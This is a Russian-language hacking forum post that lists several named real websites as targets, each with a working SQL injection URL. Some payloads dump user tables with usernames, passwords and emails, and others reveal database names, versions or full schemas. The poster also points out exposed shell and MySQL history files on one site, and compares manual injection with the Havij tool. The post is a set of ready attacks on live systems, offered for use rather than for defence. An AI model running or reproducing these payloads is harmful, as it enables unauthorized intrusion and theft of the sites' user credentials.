|
Познающий
Регистрация: 17.08.2015
Сообщений: 96
Провел на форуме:
32618
Репутация:
1
|
|
Target: http://www.gaspforair.org
Уязвимость:SQLi
Код:
http://www.gaspforair.org/gasp/gedc/artcl-new.php?ID=115 +UNION+ALL+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(housing_user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,userlevel,0x3a,username,0x3a,password,0x3c62723e))))x),3,4,5--
Target: http://www.sequentialtart.com
Уязвимость:SQLi
Код:
http://www.sequentialtart.com/article.php?id=-445+UNION+ALL+SELECT+1,2,3,4,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(seqtartprod.IPM_users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x3a,password,0x3a,email,0x3c62723e))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
Вот прогнал последнюю DirB'ом, удивился: http://www.sequentialtart.com/.bash_history и http://www.sequentialtart.com/.mysql_history
чО уж там, /etc/shadow надо в общий доступ!)))
Добавлю:
Target: http://yrmusic.com
Уязвимость:SQLi
Код:
http://yrmusic.com/v2/artists/bios/artist.php?ID=-84+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
Target: http: http://www.zam.it
Уязвимость:SQLi
Код:
http://www.zam.it/home.php?id_autore=234 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10 --
Оффтоп про вышеуказанный адрес: параллельно с Лисой (хакбар с Диосами), то ли с бодуна, то ли просто от лени, запустил Havij. Дык вот (это не первое наблюдение), он, не поверите, врет)) Не верьте Havij'у ибо он утверждает, что здесь 2 таблицы, а на самом деле, их 10)) Попробуйте последний адрес через запрос и через сию программулину))
Target: http: http://sh.newsun.dk
Уязвимость:SQLi
Код:
http://sh.newsun.dk/vis.php?id=189+UNION+ALL+SELECT+1,2,3,4,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),6,7,8--
|